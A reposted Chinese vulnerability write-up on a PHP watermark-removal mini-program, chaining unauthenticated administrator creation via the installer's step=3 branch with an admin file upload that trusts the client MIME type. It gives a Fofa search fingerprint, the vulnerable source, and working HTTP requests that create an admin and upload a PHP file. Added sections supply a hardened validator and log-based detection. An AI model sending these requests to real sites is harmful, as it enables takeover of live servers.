File Upload Vulnerability Combo in a Recent 2026 Watermark-Removal Mini-Program

admin 2026-06-18 07:19:43 Cybersecurity Articles Source: ZONE.CI 全球网

Article summary: This document analyses security vulnerabilities in a 2026 watermark-removal mini-program. The front-end install directory allows an administrator account to be created without authentication (the step=3 parameter bypasses the installed check), and the file upload function in the back-end course.php validates only the client-supplied MIME type, allowing arbitrary file upload. An attacker can chain the two to obtain back-end access and upload malicious files. Recommendations: delete the install directory, strengthen authentication, and validate file type and extension on the server side. Overall score: 78 Categories: Vulnerability Analysis, Web Security, Penetration Testing, Secure Development, Solutions



Original

Mstir Mstir

星悦安全

June 16, 2026 20:09 Zhejiang


0x00 Introduction

This mini-program supports brush-based watermark removal. The API can be pointed at your own backend: just change the response fields your API returns in the front-end home-page file. Source stack: PHP 7.4; database: MySQL.

Fofa fingerprint: "去水印小程序后台"

0x01 Unauthenticated Administrator Creation from the Front End

The flaw is in /install/index.php. As long as the install/ directory remains reachable, an attacker can request the step=3 branch directly and create a new administrator account even after the system has been installed. The code does not check whether an administrator already exists, uses no installation token, has no session binding, and does not require a back-end login.

// Check whether already installed (only redirect when no explicit install step is in progress)
$db_config_file = INSTALL_PATH . '/../config/database.php';
$requested_step = isset($_GET['step']) ? intval($_GET['step']) : (isset($_POST['step']) ? intval($_POST['step']) : 1);
// If step=3 (create admin) is being executed, do not redirect; the user must be allowed to finish setup
if ($requested_step != 3 && file_exists($db_config_file)) {
    $config = @include $db_config_file;
    if (is_array($config) && isset($config['db']) && !empty($config['db']['name']) && !empty($config['db']['user'])) {
        // Check whether an admin already exists (only redirect when installation is truly complete)
        $admin_check_file = INSTALL_PATH . '/../config/.installed';
        if (file_exists($admin_check_file)) {
            header('Location: ../admin/');
            exit;
        }
    }
}
$error = '';
$step = isset($_GET['step']) ? intval($_GET['step']) : 1;

// Handle form submission
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $step = isset($_POST['step']) ? intval($_POST['step']) : 1;
    ......
    } elseif ($step == 3) {
        // Create admin
        $username = trim($_POST['username']);
        $password = $_POST['password'];
        $confirm_password = $_POST['confirm_password'];

        if (empty($username) || empty($password)) {
            $error = '用户名和密码不能为空';
        } elseif ($password !== $confirm_password) {
            $error = '两次密码输入不一致';
        } elseif (strlen($password) < 6) {
            $error = '密码长度不能少于6位';
        } else {
            // Read config
            $config = include INSTALL_PATH . '/../config/database.php';

            try {
                $dsn = "mysql:host={$config['db']['host']};port={$config['db']['port']};dbname={$config['db']['name']};charset=utf8mb4";
                $pdo = new PDO($dsn, $config['db']['user'], $config['db']['pass'], [
                    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
                ]);

                $salt = substr(md5(uniqid(rand(), true)), 0, 32);
                $password_hash = md5(md5($password) . $salt);

                $stmt = $pdo->prepare("INSERT INTO `w_admin` (`username`, `password`, `salt`, `created_at`) VALUES (?, ?, ?, NOW())");
                $stmt->execute([$username, $password_hash, $salt]);

                // Mark installation complete (so re-entering the installer redirects instead of leaving no admin set)
                file_put_contents(INSTALL_PATH . '/../config/.installed', date('Y-m-d H:i:s'));

                // Redirect to the admin panel
                header('Location: ../admin/');
                exit;
            } catch (PDOException $e) {
                $error = '创建管理员失败: ' . $e->getMessage();
            }
        }
    }
}

Payload (add administrator):

POST /install/index.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded

step=3&username=fast&password=fast123456&confirm_password=fast123456

Then log in to the back end directly with the credentials fast | fast123456

0x02 Arbitrary File Upload in the Back End

This vulnerability can be chained with the unauthenticated administrator creation above.

The handleIconUpload function in /admin/course.php uses the client-supplied $file['type'] to decide the MIME type and places no restriction on the file extension, which results in an arbitrary file upload.

<?php
/**
 * Course management page
 */
require_once ROOT_PATH . '/config/db.php';

$db = Database::getInstance();
$msg = '';

// Handle file upload
function handleIconUpload($file) {
    if ($file['error'] === UPLOAD_ERR_OK) {
        $uploadDir = ROOT_PATH . '/uploads/course/';
        if (!is_dir($uploadDir)) {
            mkdir($uploadDir, 0755, true);
        }

        $allowedTypes = ['image/jpeg', 'image/png', 'image/gif', 'image/webp'];
        $fileType = $file['type'];

        if (!in_array($fileType, $allowedTypes)) {
            return ['error' => '只支持 JPG、PNG、GIF、WebP 格式的图片'];
        }

        $extension = pathinfo($file['name'], PATHINFO_EXTENSION);
        $newFilename = 'icon_' . time() . '_' . rand(1000, 9999) . '.' . $extension;
        $targetPath = $uploadDir . $newFilename;

        if (move_uploaded_file($file['tmp_name'], $targetPath)) {
            return '/uploads/course/' . $newFilename;
        } else {
            return ['error' => '文件上传失败'];
        }
    }
    return null;
}

// Handle form submission - add/edit course
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['save_course'])) {
    $title = trim($_POST['title']);
    $subtitle = trim($_POST['subtitle']);
    $description = trim($_POST['description']);
    $icon = trim($_POST['icon']);
    $content = trim($_POST['content']);
    $sort = intval($_POST['sort']);
    $status = isset($_POST['status']) ? 1 : 0;

    // Handle file upload
    if (isset($_FILES['icon_file']) && $_FILES['icon_file']['error'] !== UPLOAD_ERR_NO_FILE) {
        $uploadResult = handleIconUpload($_FILES['icon_file']);
        if (is_array($uploadResult) && isset($uploadResult['error'])) {
            $msg = $uploadResult['error'];
        } elseif ($uploadResult) {
            $icon = $uploadResult;
        }
    }

    if (empty($msg)) {
        if (empty($title)) {
            $msg = '课程标题不能为空';
        } else {
            $course_id = isset($_POST['course_id']) ? intval($_POST['course_id']) : 0;

            if ($course_id > 0) {
                // Update course
                $db->update('w_course', [
                    'title' => $title,
                    'subtitle' => $subtitle,
                    'description' => $description,
                    'icon' => $icon,
                    'content' => $content,
                    'sort' => $sort,
                    'status' => $status
                ], 'id = ?', [$course_id]);
                $msg = '课程更新成功!';
            } else {
                // Add course
                $db->insert('w_course', [
                    'title' => $title,
                    'subtitle' => $subtitle,
                    'description' => $description,
                    'icon' => $icon,
                    'content' => $content,
                    'sort' => $sort,
                    'status' => $status,
                    'count' => 0,
                    'created_at' => date('Y-m-d H:i:s')
                ]);
                $msg = '课程添加成功!';
            }

            // Write log entry
            $db->insert('w_use_log', [
                'type' => 'course',
                'content' => $course_id > 0 ? '更新课程: ' . $title : '添加课程: ' . $title,
                'ip' => $_SERVER['REMOTE_ADDR'] ?? '',
                'created_at' => date('Y-m-d H:i:s')
            ]);
        }
    }
}
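A hardened counterpart to handleIconUpload above, written here as an added example in Python rather than taken from the project: the browser's Content-Type is ignored, the format is sniffed from the file's leading bytes, the extension must match that format, and the stored name is assigned by the server. Function names and the sample inputs are constructed for this example.

```python
import os
import secrets
import time
from typing import Optional

# Leading-byte signatures for the formats the handler claims to accept.
SIGNATURES = {
    "jpg": [b"\xff\xd8\xff"],
    "png": [b"\x89PNG\r\n\x1a\n"],
    "gif": [b"GIF87a", b"GIF89a"],
}
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif", "webp"}

def sniff_image_type(data: bytes) -> Optional[str]:
    """Identify the image format from its magic bytes; None if no accepted format matches."""
    for kind, magics in SIGNATURES.items():
        if any(data.startswith(m) for m in magics):
            return kind
    # WebP is a RIFF container: "RIFF" <4-byte size> "WEBP".
    if len(data) >= 12 and data[:4] == b"RIFF" and data[8:12] == b"WEBP":
        return "webp"
    return None

def validate_icon_upload(filename: str, client_type: str, data: bytes) -> dict:
    """Decide whether an icon upload may be stored and under which server-chosen name.

    client_type (the browser's Content-Type, which the original code trusted) is taken
    as a parameter only to make explicit that it plays no part in the decision.
    """
    ext = os.path.splitext(filename)[1].lstrip(".").lower()
    if ext not in ALLOWED_EXT:
        return {"error": "extension not allowed", "ext": ext}
    detected = sniff_image_type(data)
    if detected is None:
        return {"error": "content is not a supported image"}
    # PNG bytes uploaded as .gif (or any other mismatch) are refused rather than renamed.
    if ext != detected and not (ext == "jpeg" and detected == "jpg"):
        return {"error": "extension does not match content", "detected": detected}
    # The stored name and extension come from the server and the detected type only;
    # nothing from the client-supplied filename is reused.
    stored = f"icon_{int(time.time())}_{secrets.token_hex(4)}.{detected}"
    return {"path": "/uploads/course/" + stored, "type": detected}
```

Pair this with web-server configuration that denies script execution under /uploads, so a check that is ever missed still cannot turn a stored file into executable code.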

Payload:

POST /admin/?action=course HTTP/1.1
Host: 127.0.0.1
Content-Length: 404
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary24LEG5fdzcWBLdCH
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cookie: a8c4ed34e706ef9c01b4fa71bead4d4a=ozb7freznaMBUJ0zKBBiM_85OnuLvbQsXBHH-I-a1mU.KM2yn7au44noGRRl9HoH2oHwPfs; PHPSESSID=fg3btbilumg36lobm2lg46769t
Connection: close

------WebKitFormBoundary24LEG5fdzcWBLdCH
Content-Disposition: form-data; name="save_course"

1
------WebKitFormBoundary24LEG5fdzcWBLdCH
Content-Disposition: form-data; name="title"

upload-poc
------WebKitFormBoundary24LEG5fdzcWBLdCH
Content-Disposition: form-data; name="icon_file"; filename="aaa.php"
Content-Type: image/png

<?php phpinfo();?>
------WebKitFormBoundary24LEG5fdzcWBLdCH--
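The two stages of the chain above leave distinct traces in ordinary web-server access logs. This is an added example, not code from the original post or the project: it parses constructed combined-format log lines, flags installer access and non-image fetches from the /uploads/course/ icon directory, and correlates the two per client. The IP addresses, timestamps and file names in the sample are constructed.

```python
import re
from typing import Dict, List

# Combined-log-format parser (fields after the status code are ignored).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
IMAGE_EXT = {"jpg", "jpeg", "png", "gif", "webp"}

# Constructed sample log: one client hits the installer (302 = the redirect to ../admin/
# after admin creation), saves a course, then fetches a .php file from the icon directory;
# a second client fetches a legitimate icon.
SAMPLE_LOG = """\
203.0.113.7 - - [16/Jun/2026:20:01:02 +0800] "POST /install/index.php HTTP/1.1" 302 -
203.0.113.7 - - [16/Jun/2026:20:01:10 +0800] "GET /admin/ HTTP/1.1" 200 4096
203.0.113.7 - - [16/Jun/2026:20:02:31 +0800] "POST /admin/?action=course HTTP/1.1" 200 5120
203.0.113.7 - - [16/Jun/2026:20:02:40 +0800] "GET /uploads/course/icon_1781000000_4242.php HTTP/1.1" 200 73000
198.51.100.2 - - [16/Jun/2026:20:03:00 +0800] "GET /uploads/course/icon_1781000001_1001.png HTTP/1.1" 200 8100
"""

def analyze(log_text: str) -> List[Dict[str, str]]:
    """Flag installer access and non-image fetches from the icon upload directory."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m["path"].split("?", 1)[0]
        if path.startswith("/install/"):
            # A deployed site should never receive installer requests at all; a POST that
            # ends in 302 is exactly the outcome of the step=3 admin-creation branch.
            sev = "high" if m["method"] == "POST" and m["status"] == "302" else "medium"
            findings.append({"ip": m["ip"], "stage": "install", "severity": sev, "path": path})
        elif path.startswith("/uploads/course/"):
            ext = path.rsplit(".", 1)[-1].lower() if "." in path else ""
            if ext not in IMAGE_EXT:
                # The handler is meant to write only icon images here, so a request for
                # any other extension means a non-image file was stored.
                findings.append({"ip": m["ip"], "stage": "upload", "severity": "high", "path": path})
    return findings

def chained_sources(findings: List[Dict[str, str]]) -> List[str]:
    """Clients seen in both stages: the installer-to-upload combination from the post."""
    stages: Dict[str, set] = {}
    for f in findings:
        stages.setdefault(f["ip"], set()).add(f["stage"])
    return sorted(ip for ip, s in stages.items() if s == {"install", "upload"})
```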

0x03 AI Vulnerability Discovery

Tags: code audit, 0day, penetration testing, system, generic, 0day, Xianyu, exchange

This vulnerability was discovered entirely by GPT5.5 via the 星悦 AI relay.

Today, June 16, all GPT models are available all evening at a 0.01x rate multiplier; use Xhigh freely, with no rate limit.

https://www.xyusec.com/

New users can also join the group to claim $5.

Disclaimer: the programs (methods) described in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; the article's author and this public account assume no legal or joint liability. Please take note!!!


Disclaimer:

The programs and technical methods in this article are intended solely for lawful and compliant security research and teaching, aim to improve network security defences, and are of a clearly technical-research nature.

Any organisation or individual who, without authorisation, uses the content of this article for attacks, sabotage or other unlawful purposes bears sole responsibility for all resulting legal liability, civil compensation and joint liability; this site assumes no joint liability.

Content on this site is published for technical exchange and knowledge sharing. If there is a copyright infringement or other objection, please contact us by e-mail; contact details are available via the "Contact me" link at the top of the page.

Reposted from: 星悦安全, Mstir Mstir, 《某2026最新去水印小程序文件上传漏洞组合拳》 (File Upload Vulnerability Combo in a Recent 2026 Watermark-Removal Mini-Program)
